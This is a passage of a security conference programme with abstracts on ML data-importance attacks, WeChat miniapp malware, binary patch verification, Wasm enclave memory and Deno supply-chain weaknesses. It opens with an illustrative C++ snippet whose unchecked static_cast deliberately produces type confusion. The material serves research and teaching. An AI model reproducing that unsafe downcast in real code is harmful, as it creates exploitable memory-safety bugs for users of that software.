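As a concrete illustration of the bug class addressed above (this is not the paper’s instrumentation, and the class and function names below are hypothetical), consider a downcast between non-polymorphic C++ classes: with no inline type information, dynamic_cast is unavailable, so a wrong static_cast compiles cleanly and silently misinterprets memory.

    // type_confusion_demo.cpp -- illustrative sketch, not type++ itself.
    // A static_cast downcast to the wrong sibling type is accepted at compile
    // time and reinterprets a Document's memory as an Image (type confusion).
    #include <iostream>
    #include <string>

    struct Base { int id = 0; };            // non-polymorphic: no vtable,
                                            // hence no runtime type info
    struct Image : Base { int width = 0, height = 0; };
    struct Document : Base { std::string title; };

    void print_image(Base* b) {
        // Base is not polymorphic, so dynamic_cast cannot be used here; the
        // programmer "knows" b is an Image and downcasts unconditionally.
        Image* img = static_cast<Image*>(b);   // confusion if b is a Document
        std::cout << img->width << "x" << img->height << "\n";
    }

    int main() {
        Document doc;
        doc.title = "quarterly report";
        print_image(&doc);   // undefined behavior: Document bytes read as ints
    }

A vanilla toolchain compiles and runs this without any diagnostic; per the abstract, type++ types all objects so that such a downcast would instead be verified dynamically.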

Topic: Software/firmware/hardware security analysis, customization, and extensions


Understanding Data Importance in Machine Learning Attacks: Does Valuable Data Pose Greater Harm?
Rui Wen, Michael Backes, Yang Zhang (CISPA Helmholtz Center for Information Security)

Abstract: Machine learning has revolutionized numerous domains, playing a crucial role in driving advancements and enabling data-centric processes. The significance of data in training models and shaping their performance cannot be overstated. Recent research has highlighted the heterogeneous impact of individual data samples, particularly the presence of valuable data that significantly contributes to the utility and effectiveness of machine learning models. However, a critical question remains unanswered: are these valuable data samples more vulnerable to machine learning attacks? In this work, we investigate the relationship between data importance and machine learning attacks by analyzing five distinct attack types. Our findings reveal notable insights. For example, we observe that high-importance data samples exhibit increased vulnerability in certain attacks, such as membership inference and model stealing. These findings also carry practical implications, inspiring researchers to design more efficient attacks. By analyzing the linkage between membership inference vulnerability and data importance, we demonstrate that sample characteristics can be integrated into membership metrics by introducing sample-specific criteria, thereby enhancing membership inference performance. These findings emphasize the urgent need for innovative defense mechanisms that strike a balance between maximizing utility and safeguarding valuable data against potential exploitation.

Topic: Security and privacy of systems based on machine learning, federated learning, AI, and large language models


Understanding the Miniapp Malware: Identification, Dissection, and Characterization
Yuqing Yang (The Ohio State University); Yue Zhang (Drexel University); Zhiqiang Lin (The Ohio State University)

Abstract: Super apps, serving as centralized platforms that manage user information and integrate third-party miniapps, have revolutionized mobile computing but also introduced significant security risks from malicious miniapps. Despite the mandatory miniapp vetting enforced by the built-in miniapp store, the threat of evolving miniapp malware persists, engaging in a continual cat-and-mouse game with platform security measures. However, compared with traditional paradigms such as mobile and web computing, no miniapp malware dataset has been available for the community to explore, hindering the generation of crucial insights and the development of robust detection techniques. In response, this paper addresses the scarcely explored territory of malicious miniapp analysis, dedicating over three years to identifying, dissecting, and examining the risks posed by these miniapps, resulting in the first miniapp malware dataset, now available to aid future studies in enhancing the security of super app ecosystems.

To build the dataset, our primary focus has been on the WeChat platform, the largest super app, hosting millions of miniapps and serving a billion users. Over an extensive period, we collected over 4.5 million miniapps, identifying a subset (19,905) as malicious through a rigorous cross-check process: 1) applying static signatures derived from real-world cases, and 2) confirming that the miniapps were delisted and removed from the market by the platform. With these identified samples, we proceed to characterize them, focusing on their lifecycle, including propagation, activation, and payload execution. Additionally, we analyzed the collected malware samples using real-world cases to demonstrate their practical security impact. Our findings reveal that these malware samples frequently target user privacy, leverage social network sharing capabilities to disseminate unauthorized services, and manipulate the advertisement-based revenue model to illicitly generate profits. These actions result in significant privacy and financial harm to both users and the platform.

Topic: Anti-malware techniques: detection, analysis, and prevention


VeriBin: Adaptive Verification of Patches at the Binary Level
Hongwei Wu (Purdue University); Jianliang Wu (Simon Fraser University); Ruoyu Wu, Ayushi Sharma, Aravind Machiry, Antonio Bianchi (Purdue University)

Abstract: Vendors are often provided with updated versions of a piece of software that fix known security issues. However, the lack of any guarantee that the patched software does not break the functionality of its original version often hinders patch deployment. This issue is particularly severe when the patched software is only provided in its compiled binary form. In this case, manual analysis of the patch’s source code is impossible, and existing automated patch analysis techniques, which rely on source code, are not applicable. Even when the source code is accessible, binary-level patch verification remains crucial, as highlighted by the recent XZ Utils backdoor.

To tackle this issue, we propose VeriBin, a system able to compare a binary with its patched version and determine whether the patch is “Safe to Apply”, meaning it does not introduce any modification that could potentially break the functionality of the original binary. To achieve this goal, VeriBin checks functional equivalence between the original and patched binaries. In particular, VeriBin first uses symbolic execution to systematically identify patch-introduced modifications. Then, it checks if the detected patch-introduced modifications respect specific properties that guarantee they will not break the original binary’s functionality. To work without source code, VeriBin’s design solves several challenges related to the absence of semantic information (removed during the compilation process) about the analyzed code and the complexity of symbolically executing large functions precisely. Our evaluation of VeriBin on a dataset of 86 samples shows that it achieves an accuracy of 93.0% with no false positives, requiring only minimal analyst input. Additionally, we showcase how VeriBin can be used to detect the recently discovered XZ Utils backdoor.

Topic: Software/firmware/hardware security analysis, customization, and extensions


WAVEN: WebAssembly Memory Virtualization for Enclaves
Weili Wang (Southern University of Science and Technology); Honghan Ji, Peixuan He, Yao Zhang, Ye Wu (ByteDance Inc.); Yinqian Zhang (Southern University of Science and Technology)

Abstract: The advancement of trusted execution environments (TEEs) has enabled the confidential computing paradigm and created new application scenarios for WebAssembly (Wasm). “Wasm+TEE” designs achieve in-enclave multi-tenancy with strong isolation, facilitating concurrent execution of untrusted code instances from multiple users. However, the linear memory model of Wasm lacks efficient cross-module data sharing and fine-grained memory access control, significantly restricting its applications in certain confidential computing scenarios where secure data sharing is essential (e.g., confidential stateful FaaS and data marketplaces). In this paper, we propose WAVEN (WebAssembly Memory Virtualization for ENclaves), a novel WebAssembly memory virtualization scheme, to enable memory sharing among Wasm modules and page-level access control. We implement WAVEN atop WAMR, a popular Wasm runtime for TEEs, and empirically demonstrate its efficiency and effectiveness. To the best of our knowledge, our work represents the first approach that enables cross-module memory sharing with fine-grained memory access control in Wasm.

Topic: Trustworthy computing software and hardware to secure networks and systems


Welcome to Jurassic Park: A Comprehensive Study of Security Risks in Deno and its Ecosystem
Abdullah AlHamdan, Cristian-Alexandru Staicu (CISPA Helmholtz Center for Information Security)

Abstract: Node.js and its ecosystem npm are notoriously insecure, enabling the proliferation of supply chain attacks. Deno is an emerging runtime that promises to offer a safer alternative for running untrusted JavaScript code outside of the browser. Learning from Node.js’s mistakes, Deno is written in Rust, a memory-safe programming language, and it includes a strict permission system that checks all accesses to sensitive APIs via static or runtime permissions. Deno also allows the inclusion of third-party code via URLs, which promises a more transparent way of handling dependencies, advocating for a fully decentralized software supply chain. In this paper, we study if Deno delivers on its promise of increased security. We find that indeed Deno has a smaller attack surface than Node.js, but there still are known attacks that are not addressed (ReDoS) or only partially mitigated (prototype pollution). Moreover, we find several weaknesses in Deno’s permission system, which allow sophisticated supply chain attacks. First, coarse-grained permissions allow attackers to abuse the ambient authority of the operating system to sidestep the permission system. Second, we find that URL imports are exempted from the permission checks, allowing attackers to perform unlawful network requests. We also identify time-of-check to time-of-use issues when handling symbolic links, making fine-grained file system access control ineffective. We then perform an empirical study of Deno’s main ecosystem deno.land to understand how developers consume third-party code and how permissions are used and communicated. We identify classical URL-related issues such as expired domains and reliance on insecure transport protocols, but we also find that it is challenging to guarantee uniform immutability and version control when multiple domains are involved in code distribution. We also provide initial evidence that developers poorly document required permissions on deno.land and that they tend to abuse coarse-grained permissions, reducing the benefits of the permission system. Our findings resulted in two security advisories for Deno and a redesign of its import mechanism. We also make concrete recommendations for improving Deno’s security model to further prevent supply chain attacks: add import permissions, additional access control at file system level, support for compartmentalization, and a manifest file that persists fine-grained permissions.

Topic: Security of web-based applications and services (e.g., social networking, crowd-sourcing, fake news/disinformation), web security and privacy